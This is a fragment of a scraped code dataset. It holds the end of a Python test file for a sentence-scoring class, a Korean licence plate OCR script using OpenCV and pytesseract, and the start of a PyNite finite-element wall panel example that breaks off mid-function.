sample\n \"\"\"\n expected = sentence.total_score\n received = score_total(\n sentence.title_score, sentence.keyword_score,\n sentence.length_score, sentence.position_score)\n\n assert kinda.eq(received, expected)\n# pylint: enable=unused-argument\n\n\n# pylint: disable=no-self-use\nclass TestScoredSentence:\n \"\"\"Test `ScoredSentence`\"\"\"\n @param_scored_sentence__init_()\n def test__init_(self, init: list, expected: list):\n \"\"\"Test `ScoredSentence` initialization\n\n Arguments:\n init {list} -- initialization parameters\n expected {list} -- expected property values\n \"\"\"\n inst = ScoredSentence('', *range(6))\n inst._init_(*init) # pylint: disable=protected-access\n received = get_inst_comp(inst)\n\n assert received == expected\n\n @param_scored_sentence___init__()\n def test___init__(self, init: list, expected: list):\n \"\"\"Test `ScoredSentence` initialization\n\n Arguments:\n init {list} -- initialization parameters\n expected {list} -- expected property values\n \"\"\"\n inst = ScoredSentence(*init[:-3])\n received = get_inst_comp(inst)\n\n assert received == expected\n\n @param_scored_sentence__str__()\n def test___str__(self, init: list, expected: str):\n \"\"\"Test `ScoredSentence` string cast\n\n Arguments:\n init {list} -- initialization parameters\n expected {str} -- expected value\n \"\"\"\n inst = ScoredSentence(*init[:-3])\n received = str(inst)\n\n assert received == expected\n\n @param_scored_sentence__repr__()\n def test___repr__(self, init: list, expected: str):\n \"\"\"Test `ScoredSentence` REPR\n\n Arguments:\n init {list} -- initialization parameters\n expected {str} -- expected value\n \"\"\"\n inst = ScoredSentence(*init[:-3])\n received = repr(inst)\n\n assert received == expected\n\n # pylint: disable=unused-argument\n @param_comp()\n def test___eq__(\n self,\n sent_a: ScoredSentence,\n sent_b: ScoredSentence,\n is_lt: bool,\n is_eq: bool):\n \"\"\"Test `ScoredSentence` equality\n\n Arguments:\n sent_a {ScoredSentence} -- sentence A\n sent_b {ScoredSentence} -- sentence B\n is_lt {bool} -- sentence A is Less Than sentence B\n is_eq {bool} -- sentence A is EQual to sentence B\n \"\"\"\n expected = is_eq\n received = sent_a == sent_b\n\n assert received == expected\n\n @param_comp()\n def test___lt__(\n self,\n sent_a: ScoredSentence,\n sent_b: ScoredSentence,\n is_lt: bool,\n is_eq: bool):\n \"\"\"Test `ScoredSentence` less-than\n\n Arguments:\n sent_a {ScoredSentence} -- sentence A\n sent_b {ScoredSentence} -- sentence B\n is_lt {bool} -- sentence A is Less Than sentence B\n is_eq {bool} -- sentence A is EQual to sentence B\n \"\"\"\n expected = is_lt\n received = sent_a < sent_b\n\n assert received == expected\n\n @param_comp()\n def test___gt__(\n self,\n sent_a: ScoredSentence,\n sent_b: ScoredSentence,\n is_lt: bool,\n is_eq: bool):\n \"\"\"Test `ScoredSentence` greater-than\n\n Arguments:\n sent_a {ScoredSentence} -- sentence A\n sent_b {ScoredSentence} -- sentence B\n is_lt {bool} -- sentence A is Less Than sentence B\n is_eq {bool} -- sentence A is EQual to sentence B\n \"\"\"\n expected = (not is_lt) and (not is_eq)\n received = sent_a > sent_b\n\n assert received == expected\n","sub_path":"tests/summarizer/test_scored_sentence.py","file_name":"test_scored_sentence.py","file_ext":"py","file_size_in_byte":6258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"181034118","text":"import cv2\r\nimport numpy as np\r\nimport pytesseract\r\nimport time\r\nfrom PIL import Image\r\n\r\n'''\r\ndef 
check():\r\n return \"파일 함수 불러오기는 했음\"\r\n''' \r\n# --Read Input Image--\r\ndef number_recognition(cut_image):\r\n src = cv2.imread(cut_image) #이미지 불러오기\r\n print(\"불러오기는 했음\")\r\n '''\r\n dst = src.copy() # 이미지영역을 반으로 자르기(번호판 인식률 속도를 높이기 위함)\r\n dst = src[480:960, 50:670]\r\n cv2.imshow(\"half img\", dst)\r\n cv2.waitKey(0)\r\n '''\r\n\r\n prevtime = time.time() # 걸린 시간 체크하는 함수\r\n\r\n # 변수 선언\r\n height, width, channel = src.shape # 이미지에 대한 값을 가질 변수\r\n\r\n numcheck = 0 # 반복문에서 번호판 문자열 검사할 변수\r\n charsok = 0 # 반복문에서 번호판 글자를 제대로 읽었는지 검사할 변수\r\n add_w_padding, add_h_padding = 0, 0 # 추가할 padding값을 가질 변수\r\n w_padding_max, h_padding_max = 0, 0 # 일정한 padding값을 가지게되었을때 반복문을 제어할 변수\r\n\r\n # --Convert Image to Grayscale-- (이미지 흑백변환)\r\n\r\n gray = cv2.cvtColor(src, cv2.COLOR_BGR2GRAY) # 이미지 흑백변환\r\n\r\n # --Maximize Contrast(Optional)-- (흑백대비 최대화)\r\n\r\n structuringElement = cv2.getStructuringElement(cv2.MORPH_RECT, (3, 3))\r\n\r\n imgTopHat = cv2.morphologyEx(gray, cv2.MORPH_TOPHAT, structuringElement)\r\n imgBlackHat = cv2.morphologyEx(gray, cv2.MORPH_BLACKHAT, structuringElement)\r\n\r\n imgGrayscalePlusTopHat = cv2.add(gray, imgTopHat)\r\n gray = cv2.subtract(imgGrayscalePlusTopHat, imgBlackHat)\r\n\r\n # --Adaptive Thresholding-- (가우시안블러(이미지 노이즈 제거) 및 쓰레시 홀딩)\r\n\r\n img_blurred = cv2.GaussianBlur(gray, ksize=(5, 5), sigmaX=0) # GaussianBlur 적용\r\n\r\n img_thresh = cv2.adaptiveThreshold( # adaptiveThreshold 적용\r\n img_blurred,\r\n maxValue=255.0,\r\n adaptiveMethod=cv2.ADAPTIVE_THRESH_GAUSSIAN_C,\r\n thresholdType=cv2.THRESH_BINARY_INV,\r\n blockSize=19,\r\n C=9\r\n )\r\n\r\n # --Find Contours-- (윤곽선 찾기)\r\n\r\n contours, hierarchy = cv2.findContours( # opencv의 findContours를 이용하여 contours에 저장\r\n img_thresh,\r\n cv2.RETR_LIST,\r\n cv2.CHAIN_APPROX_SIMPLE\r\n )\r\n\r\n temp_result = np.zeros((height, width, channel), dtype=np.uint8) # numpy.zeros를 이용하여 윤곽선 범위 저장\r\n\r\n cv2.drawContours(temp_result, contours, -1, (255, 255, 255)) # 윤곽선 그리기\r\n\r\n # --Prepare Data-- (데이터 비교하기, 글자영역으로 추정되는 rectangle 그리기)\r\n\r\n temp_result = np.zeros((height, width, channel),\r\n dtype=np.uint8) # drawContours를 이용해 그린 윤곽선에 다시 numpy.zeros를 이용해 다시 윤곽선 범위 저장 (안하면 윤곽선 좀 남아있음)\r\n\r\n contours_dict = [] # contour 정보를 모두 저장받을 리스트 변수\r\n\r\n for contour in contours:\r\n x, y, w, h = cv2.boundingRect(contour) # 위치 높낮이 데이터 정보 저장\r\n cv2.rectangle(temp_result, pt1=(x, y), pt2=(x + w, y + h), color=(255, 255, 255),\r\n thickness=2) # 윤곽선을 감싸는 사각형 구하기\r\n\r\n # insert to dict\r\n contours_dict.append({ # contour 정보를 모두 저장\r\n 'contour': contour,\r\n 'x': x,\r\n 'y': y,\r\n 'w': w,\r\n 'h': h,\r\n 'cx': x + (w / 2),\r\n 'cy': y + (h / 2)\r\n })\r\n\r\n # --Select Candidates by Char Size-- (글자 같은 영역 찾기)\r\n\r\n MIN_AREA = 80 # 윤곽선의 가운데 렉트 최소 넓이 80\r\n MIN_WIDTH, MIN_HEIGHT = 2, 8 # 바운드 렉트의 최소 너비와 높이는 2, 8\r\n MIN_RATIO, MAX_RATIO = 0.25, 1.0 # 바운드 렉트의 비율 가로 대비 세로 비율 최솟값 0.25, 최댓값 1.0\r\n\r\n possible_contours = [] # 글자로 예상되는 contour들을 저장받을 리스트 변수\r\n\r\n cnt = 0 # count 변수\r\n for d in contours_dict: # contours_dict에 저장된 것을 조건에 맞다면 possible_contours에 append\r\n area = d['w'] * d['h']\r\n ratio = d['w'] / d['h']\r\n\r\n if area > MIN_AREA \\\r\n and d['w'] > MIN_WIDTH and d['h'] > MIN_HEIGHT \\\r\n and MIN_RATIO < ratio < MAX_RATIO:\r\n d['idx'] = cnt\r\n cnt += 1\r\n possible_contours.append(d)\r\n\r\n # visualize possible contours\r\n temp_result = np.zeros((height, width, channel), dtype=np.uint8)\r\n\r\n for d in possible_contours:\r\n # cv2.drawContours(temp_result, d['contour'], -1, (255, 255, 255))\r\n 
cv2.rectangle(temp_result, pt1=(d['x'], d['y']), pt2=(d['x'] + d['w'], d['y'] + d['h']), color=(255, 255, 255),\r\n thickness=2) # 글자로 예상되는 영역만 rectangle 그리기\r\n\r\n # --Select Candidates by Arrangement of Contours-- (글자의 연속성(번호판으로 예상되는 영역) 찾기)\r\n\r\n MAX_DIAG_MULTIPLYER = 4.7 # 5 contour와 contour의 사이의 길이 (값계속 바꿔가면서 테스트 해야함)\r\n MAX_ANGLE_DIFF = 13 # 12.0 첫번째 contour와 두번째 contour의 직각 삼각형의 앵글 세타각도\r\n MAX_AREA_DIFF = 0.5 # 0.5 면적의 차이\r\n MAX_WIDTH_DIFF = 0.8 # 0.8 contour 간의 가로길이 차이\r\n MAX_HEIGHT_DIFF = 0.2 # 0.2 contour 간의 세로길이 차이\r\n MIN_N_MATCHED = 4 # 3 글자영역으로 예측된 것의 최소 갯수 (ex 3개이상이면 번호판일 것)\r\n\r\n def find_chars(contour_list): # 재귀함수로 번호판 후보군을 계속 찾음\r\n matched_result_idx = [] # 최종 결과값의 인덱스를 저장\r\n\r\n for d1 in contour_list: # 컨투어(d1, d2)를 서로 비교\r\n matched_contours_idx = []\r\n for d2 in contour_list:\r\n if d1['idx'] == d2['idx']:\r\n continue\r\n\r\n dx = abs(d1['cx'] - d2['cx'])\r\n dy = abs(d1['cy'] - d2['cy'])\r\n\r\n diagonal_length1 = np.sqrt(d1['w'] ** 2 + d1['h'] ** 2)\r\n\r\n distance = np.linalg.norm(\r\n np.array([d1['cx'], d1['cy']]) - np.array([d2['cx'], d2['cy']])) # d1과 d2거리를 계산\r\n if dx == 0: # dx의 절댓값이 0이라면 (d1과 d2의 x값을 갖고 있다면)\r\n angle_diff = 90\r\n else:\r\n angle_diff = np.degrees(np.arctan(dy / dx)) # 아크탄젠트 값을 구함 (라디안)\r\n area_diff = abs(d1['w'] * d1['h'] - d2['w'] * d2['h']) / (d1['w'] * d1['h']) # 면적의 비율\r\n width_diff = abs(d1['w'] - d2['w']) / d1['w'] # 너비의 비율\r\n height_diff = abs(d1['h'] - d2['h']) / d1['h'] # 높이의 비율\r\n\r\n if distance < diagonal_length1 * MAX_DIAG_MULTIPLYER \\\r\n and angle_diff < MAX_ANGLE_DIFF and area_diff < MAX_AREA_DIFF \\\r\n and width_diff < MAX_WIDTH_DIFF and height_diff < MAX_HEIGHT_DIFF:\r\n matched_contours_idx.append(d2['idx']) # 설정한 파라미터 기준에 맞는 값들의 인덱스만 append\r\n\r\n # append this contour\r\n matched_contours_idx.append(d1['idx']) # d1을 빼먹고 넣었으므로 d1도 넣어줌\r\n\r\n if len(matched_contours_idx) < MIN_N_MATCHED: # 예상한 번호판의 최소 갯수가 맞지 않다면 continue\r\n continue\r\n\r\n matched_result_idx.append(matched_contours_idx) # 최종후보군으로 넣음 append\r\n\r\n unmatched_contour_idx = [] # 최종 후보군이 아닌 것들도 아닌 것들끼리 한번 더 비교\r\n for d4 in contour_list:\r\n if d4['idx'] not in matched_contours_idx: # matched_contours_idx가 아닌 것들\r\n unmatched_contour_idx.append(d4['idx'])\r\n\r\n unmatched_contour = np.take(possible_contours,\r\n unmatched_contour_idx) # numpy.take를 이용해서 unmatched_contour에 저장\r\n\r\n # recursive\r\n recursive_contour_list = find_chars(unmatched_contour) # 다시 돌려봄\r\n\r\n for idx in recursive_contour_list:\r\n matched_result_idx.append(idx) # 최종 결과값을 matched_result_idx에 다시 저장\r\n\r\n break\r\n\r\n return matched_result_idx\r\n\r\n result_idx = find_chars(possible_contours)\r\n\r\n matched_result = [] # 예상되는 번호판 contour정보를 담을 리스트 변수\r\n for idx_list in result_idx:\r\n matched_result.append(np.take(possible_contours, idx_list))\r\n\r\n # visualize possible contours (번호판 contour 그리기)\r\n temp_result = np.zeros((height, width, channel), dtype=np.uint8)\r\n\r\n for r in matched_result: # 번호판으로 예상되는 영역을 그림\r\n for d in r:\r\n # cv2.drawContours(temp_result, d['contour'], -1, (255, 255, 255))\r\n cv2.rectangle(temp_result, pt1=(d['x'], d['y']), pt2=(d['x'] + d['w'], d['y'] + d['h']),\r\n color=(255, 255, 255),\r\n thickness=2)\r\n\r\n # --Rotate Plate Images-- (이미지 회전)\r\n\r\n plate_imgs = [] # 번호판 이미지를 담을 리스트 변수\r\n plate_infos = [] # 번호판 정보를 담을 리스트 변수\r\n\r\n longest_idx, longest_text = -1, 0 # idx값 초기화\r\n plate_chars = [] # 번호판 리스트 변수\r\n\r\n while charsok == 0: # 번호판 글자로 예상되는 값이 나올 때까지 반복\r\n PLATE_WIDTH_PADDING = 1.267 + add_w_padding 
# 가로 패딩 값 예제 디폴트는 1.3\r\n PLATE_HEIGHT_PADDING = 1.51 + add_h_padding # 세로 패딩 값 예제 디폴트는 1.5\r\n MIN_PLATE_RATIO = 3 # 3 최소 번호판 비율\r\n MAX_PLATE_RATIO = 10 # 10 최대 번호판 비율\r\n\r\n for i, matched_chars in enumerate(matched_result):\r\n sorted_chars = sorted(matched_chars, key=lambda x: x['cx'])\r\n\r\n plate_cx = (sorted_chars[0]['cx'] + sorted_chars[-1]['cx']) / 2\r\n plate_cy = (sorted_chars[0]['cy'] + sorted_chars[-1]['cy']) / 2\r\n\r\n plate_width = (sorted_chars[-1]['x'] + sorted_chars[-1]['w'] - sorted_chars[0]['x']) * PLATE_WIDTH_PADDING\r\n\r\n sum_height = 0\r\n for d in sorted_chars:\r\n sum_height += d['h']\r\n\r\n plate_height = int(sum_height / len(sorted_chars) * PLATE_HEIGHT_PADDING)\r\n\r\n triangle_height = sorted_chars[-1]['cy'] - sorted_chars[0]['cy'] # 번호판의 간격을 삼각형을 기준으로 세타 값을 구함\r\n triangle_hypotenus = np.linalg.norm(\r\n np.array([sorted_chars[0]['cx'], sorted_chars[0]['cy']]) -\r\n np.array([sorted_chars[-1]['cx'], sorted_chars[-1]['cy']])\r\n )\r\n\r\n angle = np.degrees(np.arcsin(triangle_height / triangle_hypotenus)) # 라디안 값을 구해서 각도로 바꿈\r\n\r\n rotation_matrix = cv2.getRotationMatrix2D(center=(plate_cx, plate_cy), angle=angle,\r\n scale=1.0) # 로테이션 이미지 구하기\r\n\r\n img_rotated = cv2.warpAffine(img_thresh, M=rotation_matrix, dsize=(width, height)) # 이미지 변형\r\n\r\n img_cropped = cv2.getRectSubPix( # 회전된 이미지에서 원하는 부분만 자름\r\n img_rotated,\r\n patchSize=(int(plate_width), int(plate_height)),\r\n center=(int(plate_cx), int(plate_cy))\r\n )\r\n\r\n if img_cropped.shape[1] / img_cropped.shape[0] < MIN_PLATE_RATIO or img_cropped.shape[1] / \\\r\n img_cropped.shape[\r\n 0] < MIN_PLATE_RATIO > MAX_PLATE_RATIO: # 번호판 비율이 맞지 않다면 continue\r\n continue\r\n\r\n plate_imgs.append(img_cropped) # plate_imgs에 append\r\n\r\n plate_infos.append({ # plate_infos에 append\r\n 'x': int(plate_cx - plate_width / 2),\r\n 'y': int(plate_cy - plate_height / 2),\r\n 'w': int(plate_width),\r\n 'h': int(plate_height)\r\n })\r\n\r\n # --Another Thresholding to Find Chars-- (찾은문자에서 다시 쓰레시홀딩)\r\n\r\n for i, plate_img in enumerate(plate_imgs):\r\n if numcheck > 3: # 예상되는 번호판 영역에서 문자열을 검사해 숫자 3개가 넘는다면(번호판일 확률이 높다면)\r\n break\r\n\r\n plate_img = cv2.resize(plate_img, dsize=(0, 0), fx=1.6, fy=1.6)\r\n _, plate_img = cv2.threshold(plate_img, thresh=0.0, maxval=255.0,\r\n type=cv2.THRESH_BINARY | cv2.THRESH_OTSU) # 쓰레시홀딩\r\n\r\n # find contours again (same as above)\r\n contours, hierarchy = cv2.findContours(plate_img, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE) # contour 다시 찾기\r\n\r\n plate_min_x, plate_min_y = plate_img.shape[1], plate_img.shape[0]\r\n plate_max_x, plate_max_y = 0, 0\r\n\r\n for contour in contours:\r\n x, y, w, h = cv2.boundingRect(contour) # for문을 돌려 boundingRect를 다시 구함\r\n\r\n area = w * h # 면적\r\n ratio = w / h # 비율\r\n\r\n if area > MIN_AREA \\\r\n and w > MIN_WIDTH and h > MIN_HEIGHT \\\r\n and MIN_RATIO < ratio < MAX_RATIO: # 설정한 기준(파라미터)에 맞는지 다시 확인\r\n if x < plate_min_x: # x, y의 최댓값,최소값을 구함\r\n plate_min_x = x\r\n if y < plate_min_y:\r\n plate_min_y = y\r\n if x + w > plate_max_x:\r\n plate_max_x = x + w\r\n if y + h > plate_max_y:\r\n plate_max_y = y + h\r\n\r\n img_result = plate_img[plate_min_y:plate_max_y, plate_min_x:plate_max_x] # 이미지를 번호판 부분만 잘라내기\r\n\r\n img_result = cv2.GaussianBlur(img_result, ksize=(3, 3), sigmaX=0) # GaussianBlur(노이즈 제거)\r\n _, img_result = cv2.threshold(img_result, thresh=0.0, maxval=255.0,\r\n type=cv2.THRESH_BINARY | cv2.THRESH_OTSU) # 쓰레시홀딩 한번 더\r\n img_result = cv2.copyMakeBorder(img_result, top=10, bottom=10, left=10, right=10,\r\n 
borderType=cv2.BORDER_CONSTANT, # 이미지에 패딩(여백)을 줌\r\n value=(0, 0, 0)) # 검은색\r\n\r\n cv2.imwrite('00.jpg', img_result)\r\n chars = pytesseract.image_to_string(Image.open('00.jpg'), config='--psm 7 --oem 0',\r\n lang='kor') # 저장한 이미지를 불러 pytesseract로 읽음\r\n nowtime = time.time()\r\n print(\"이미지 불러 온 후 글자 : \" + chars)\r\n\r\n result_chars = '' # 번호판 인식 문자 정보를 담을 변수\r\n has_digit = False\r\n for c in chars: # 판독해서 특수문자를 제외한 한글 문자와 숫자 넣기\r\n if ord('가') <= ord(c) <= ord('힣') or c.isdigit(): # 숫자나 한글이 포함되어 있는지\r\n if c.isdigit():\r\n has_digit = True # 숫자가 하나라도 있는지\r\n result_chars += c\r\n\r\n for n in range(len(result_chars)): # 번호판 형식이 맞는지 다시한번 검사 및 문자열 자르기\r\n if len(result_chars) < 7: # 번호판 길이가 7자리(번호판의 최소 길이는 7자리)보다 짧다면\r\n break\r\n elif result_chars[0].isdigit() == False: # 첫문자가 문자라면(숫자가 아니라면) 자르기\r\n result_chars = result_chars[1:result_chars.__len__()]\r\n\r\n elif result_chars[len(result_chars) - 1].isdigit() == False: # 마지막 문자가 한글데이터라면(숫자가 아니라면) 자르기\r\n result_chars = result_chars[0:(result_chars.__len__() - 1)]\r\n\r\n plate_chars.append(result_chars) # 결과 result_chars를 plate_chars에 append\r\n\r\n for j in range(len(result_chars)): # 번호판의 배열이 나오는지를 검사 ex) 12가3456(7자리번호판) or 123가4567(8자리번호판)\r\n if len(result_chars) < 7: # 결과길이가 7자리(번호판의 최소 길이는 7자리)보다 짧다면\r\n break\r\n elif (j == 2 and result_chars[j].isdigit() == True) and result_chars[\r\n j + 1].isdigit() == True: # 번호판의 3번째와 4번째가 동시에 숫자라면(글자가 아니라면)\r\n break\r\n elif (j != 2 and j != 3) and result_chars[j].isdigit() == False: # 번호판의 3,4번째(글자영역)가 아닌데 문자라면\r\n break\r\n elif (j == 2 and result_chars[j].isdigit() == False) and result_chars[\r\n j + 1].isdigit() == False: # 번호판의 3,4번째자리가 둘 다 문자라면\r\n break\r\n if 6 <= j and result_chars[j].isdigit() == True: # 6번째까지 숫자자리에 문자가 없고 7번째 영역이 숫자라면 번호판일 것\r\n charsok = 1 # 반복문을 멈춤\r\n break\r\n\r\n if has_digit and len(result_chars) > longest_text: # 조건을 만족하면\r\n longest_idx = i # 가장 긴 값을 인덱스로 줌\r\n\r\n for numch, in result_chars: # 문자열 검사를 통해 숫자가 3개 이상이라면 번호판일 확률이 높으므로 이 plate_imgs는 번호판일 것임 그러므로 패딩값을 조절하면 되기에 이미지는 고정할 것\r\n if numch.isdigit() == True:\r\n numcheck += 1\r\n\r\n # --Result-- (결과값)\r\n\r\n info = plate_infos[longest_idx] # 번호판 좌표 정보 담기\r\n chars = plate_chars[longest_idx] # 번호판 문자열 정보 담기\r\n\r\n # 가로 패딩값을 0.1씩 늘림 -> 가로를 초기화 후 세로 패딩값을 0.1씩 늘림 -> 가로 세로 패딩값을 0.1씩 늘림 모두 0.6이 되면 프로그램 종료\r\n if add_w_padding <= 0.6 and w_padding_max == 0: # w패딩이 0.5보다 작다면 (가로 패딩만 먼저 늘려보기)\r\n add_w_padding += 0.1 # w패딩을 0.1씩 증가\r\n\r\n elif w_padding_max == 1 and add_h_padding <= 0.6 and h_padding_max == 0: # w패딩이 0.5를 찍고 h패딩이 0.5보다 작다면\r\n add_w_padding = 0 # w패딩을 다시 Default값으로 (세로 패딩만 늘려보기)\r\n add_h_padding += 0.1 # h패딩을 0.1씩 증가\r\n\r\n if add_w_padding == 0.6: # 0.6까지 늘어났다면\r\n w_padding_max = 1\r\n if add_h_padding == 0.6: # 0.6까지 늘어났다면\r\n h_padding_max = 1\r\n add_w_padding = 0\r\n add_h_padding = 0\r\n\r\n if w_padding_max == 1 and h_padding_max == 1: # 너비높이 0.1씩 증��시키기\r\n add_w_padding += 0.1\r\n add_h_padding += 0.1\r\n if add_w_padding == 0.6 and add_h_padding == 0.6: # 패딩값을 너비 높이 다 0.6씩 늘렸다면(번호판을 못 찾았다면)\r\n break\r\n # 초기화\r\n numcheck = 0\r\n plate_imgs = []\r\n plate_chars = []\r\n\r\n sec = nowtime - prevtime\r\n print(\"걸린시간 %0.5f\" % sec)\r\n print(\"최종 값 : \" + chars)\r\n\r\n img_out = src.copy()\r\n cv2.rectangle(img_out, pt1=(info['x'], info['y']), pt2=(info['x'] + info['w'], info['y'] + info['h']),\r\n color=(255, 0, 0), thickness=2) # 원본 이미지에 번호판 영역 그리기\r\n\r\n cv2.imwrite('result.jpg', img_out) #원본 이미지에서 번호판 영역 추출한 
사진","sub_path":"NumberPlate.py","file_name":"NumberPlate.py","file_ext":"py","file_size_in_byte":20134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"605014515","text":"#%%\n# This is an example of how quads can be used to create a wall panel for out-of-plane bending problems.\n# A 'RectWall' class has been defined to automate the process of meshing, loading, and plotting results for a wall\n# panel of any geometry and edge support conditions. At the bottom of this file (below the class\n# definition) is a brief script showing how the 'RectWall' class can be implemented, as well\n# as a discussion of the nuances of quad elements the user should be aware of.\n\n#%%\nfrom PyNite import FEModel3D, Node3D, Quad3D\n\n# Packages used for plotting contours\nimport numpy as np\nimport matplotlib.cm as cm\nimport matplotlib.pyplot as plt\n\n#%%\nclass RectWall():\n\n # Constructor\n def __init__(self, width, height, thickness, E=3824, nu=0.17, mesh_size=1, bot_support='Pinned', top_support='Pinned', left_support='Free', right_support='Free'):\n\n self.width = width\n self.height = height\n self.thickness = thickness\n self.mesh_size = mesh_size\n\n self.E = E\n self.nu = nu\n\n self.fem = FEModel3D() # A finite element model for the wall\n\n self.loads = [] # A list of surface loads applied to the wall panel\n self.nodes = [] # A list of nodes that make up the wall panel\n self.quads = [] # A list of quadrilaterals that make up the wall panel\n\n self.bot_support = bot_support\n self.top_support = top_support\n self.left_support = left_support\n self.right_support = right_support\n\n self.__analyzed = False\n \n # Adds a pressure load to the wall\n def add_load(self, y_bot, y_top, p_bot, p_top):\n \n # Add the load to the wall\n self.loads.append((y_bot, y_top, p_bot, p_top))\n self.__analyzed = False\n \n # Removes all loads from the wall\n def clear_loads(self):\n\n # Clear all the wall loads\n self.loads = []\n self.__analyzed = False\n self.fem.ClearLoads()\n \n # Descritizes the wall\n def __descritize(self):\n\n # Determine how many columns of quads are necessary\n num_cols = round(self.width/self.mesh_size)\n\n # Determine the quad width\n pl_width = self.width/num_cols\n\n # Create a list to store mesh control points along the height of the wall\n # and add the top and bottom of the wall to the list\n y = [0.0, self.height]\n\n # Add a control point for each height where the load changes\n for load_item in self.loads:\n\n # Add the load start and end locations\n y.append(load_item[0])\n y.append(load_item[1])\n\n # Remove duplicates from the list of control points\n y = list(set(y))\n \n # Sort the list\n y.sort()\n\n # Prepare to iterate through each control point after the first one\n iter_y = iter(y)\n next(iter_y)\n y_prev = 0.0\n\n # Initialize the quad and node ID's to 1\n pl_id = 1\n node_id = 1\n\n # Create the bottom row of nodes\n for i in range(num_cols + 1):\n self.fem.AddNode('N'+str(node_id), i*pl_width, 0.0, 0.0)\n node_id += 1\n\n # Add quads and nodes between each control point\n for control_point in iter_y:\n\n # Determine the height between control points (\"lift\" height)\n h = control_point - y_prev\n\n # Determine how many rows of quads are needed in the lift\n num_rows = max(1, round(h/self.mesh_size))\n\n # Determine the quad height\n pl_height = h/num_rows\n\n # Generate nodes\n for j in range(num_rows + 1):\n for i in range(num_cols + 1):\n \n # The first row of nodes in the lift has already been 
generated\n if j != 0:\n\n # Generate the node\n self.fem.AddNode('N'+str(node_id), i*pl_width, j*pl_height + y_prev, 0.0)\n node_id += 1\n \n # Generate quadrilaterals\n for j in range(num_rows):\n for i in range(num_cols):\n\n # Determine which nodes the quadrilateral will be attached to\n ni = pl_id + max(0, int((pl_id - 1)/num_cols))\n nj = ni + 1\n nm = nj + (num_cols + 1)\n nn = nm - 1\n\n # Add the quadrilateral to the list of quadrilaterals\n self.fem.AddQuad('Q'+str(pl_id), 'N'+str(ni), 'N'+str(nj), 'N'+str(nm), 'N'+str(nn), self.thickness, self.E, self.nu) \n\n # Prepare to move to the next iteration\n pl_id += 1\n \n # Prepare for the next iteration\n y_prev = control_point\n\n # Defines support conditions at each node\n def __define_supports(self):\n\n # Step through each node in the model\n for node in self.fem.Nodes.values():\n\n # Determine if the node falls on any of the boundaries\n # Left edge\n if np.isclose(node.X, 0.0):\n if self.left_support == \"Fixed\":\n node.SupportDX, node.SupportDY, node.SupportDZ, node.SupportRX, node.SupportRY = True, True, True, True, True\n elif self.left_support == \"Pinned\":\n node.SupportDX, node.SupportDY, node.SupportDZ = True, True, True\n # Right edge\n elif np.isclose(node.X, self.width):\n if self.right_support == \"Fixed\":\n node.SupportDX, node.SupportDY, node.SupportDZ, node.SupportRX, node.SupportRY = True, True, True, True, True\n elif self.right_support == \"Pinned\":\n node.SupportDX, node.SupportDY, node.SupportDZ = True, True, True\n # Bottom edge\n elif np.isclose(node.Y, 0.0):\n if self.bot_support == \"Fixed\":\n node.SupportDX, node.SupportDY, node.SupportDZ, node.SupportRX, node.SupportRY = True, True, True, True, True\n elif self.bot_support == \"Pinned\":\n node.SupportDX, node.SupportDY, node.SupportDZ = True, True, True\n # Top edge\n elif np.isclose(node.Y, self.height):\n if self.top_support == \"Fixed\":\n node.SupportDX, node.SupportDY, node.SupportDZ, node.SupportRX, node.SupportRY = True, True, True, True, True\n elif self.top_support == \"Pinned\":\n node.SupportDX, node.SupportDY, node.SupportDZ = True, True, True\n \n # The next line can be uncommented to test skewed grids\n # node.X = node.X - node.Y*0.1\n\n # Analyzes the wall\n def analyze(self):\n\n # Descritize the wall\n self.__descritize()\n\n # Add supports to the wall\n self.__define_supports()\n\n # Add quad loads to the model\n for quad in self.fem.Quads.values():\n\n i_node = quad.iNode\n j_node = quad.jNode\n m_node = quad.mNode\n n_node = quad.nNode\n\n # Calculate the average Y coordinate of the four nodes\n avgY = (i_node.Y + j_node.Y + m_node.Y + n_node.Y)/4\n\n # Add quad surface loads to the model\n pressure = 0\n for load in self.loads:\n \n y1 = load[0]\n y2 = load[1]\n p1 = load[2]\n p2 = load[3]\n\n # Calculate the pressure on the quad and the load it applied to each of its nodes\n if avgY <= y2 and avgY >= y1:\n\n # Calculate the pressure the quadrilateral\n pressure += (p2 - p1)/(y2 - y1)*(avgY - y1) + p1\n \n # Add the surface pressure to the quadrilateral\n quad.pressures.append([pressure, 'Case 1'])\n\n # Analyze the model\n self.fem.Analyze(sparse=True)\n\n # Find the maximum displacement\n DZ = self.fem.Nodes['N1'].DZ['Combo 1']\n for node in self.fem.Nodes.values():\n if abs(node.DZ['Combo 1']) > abs(DZ):\n DZ = node.DZ['Combo 1']\n\n print('Max Displacement:', DZ)\n\n # Creates a contour plot of the wall forces\n def plot_forces(self, force_type):\n \"\"\"\n Returns a plot of the wall's internal forces\n \"\"\"\n \n # 
Determine the total number of nodes in the wall\n num_nodes = len(self.fem.Nodes)\n\n # Create a list of unique node X-coordinates\n x = []\n for i in range(num_nodes):\n x.append(self.fem.Nodes['N' + str(i + 1)].X)\n if self.fem.Nodes['N' + str(i + 2)].X < self.fem.Nodes['N' + str(i + 1)].X:\n break\n \n # Get the number of columns of nodes\n num_cols = len(x)\n \n # Determine how many rows of nodes\n num_rows = int(round(num_nodes/num_cols, 0))\n\n # Initialize a list of unique Y-coordinates\n y = [self.fem.Nodes['N1'].Y]\n y_prev = self.fem.Nodes['N1'].Y\n\n # Initialize the list of node force results\n z = []\n\n # Determine which index in the 'M' vector we're interested in\n if force_type == 'Mx':\n index = 0\n elif force_type == 'My':\n index = 1\n elif force_type == 'Mxy':\n index = 2\n elif force_type == 'Qx':\n index = 0\n elif force_type == 'Qy':\n index = 1\n\n # Step through each node\n for node in self.fem.Nodes.values():\n\n # Add unique node Y-coordinates as we go\n if node.Y > y_prev:\n y.append(node.Y)\n y_prev = node.Y\n \n # Initialize the force at the node to zero\n force = 0\n count = 0\n\n # Find the quadrilaterals that attach to the node\n for quad in self.fem.Quads.values():\n\n # Sum quad corner forces at the node\n if quad.iNode.ID == node.ID:\n if force_type == 'Qx' or force_type == 'Qy':\n force += quad.shear(-1, -1, 'Combo 1')[index][0]\n else:\n force += quad.moment(-1, -1, 'Combo 1')[index][0]\n count += 1\n elif quad.jNode.ID == node.ID:\n if force_type == 'Qx' or force_type == 'Qy':\n force += quad.shear(1, -1, 'Combo 1')[index][0]\n else:\n force += quad.moment(1, -1, 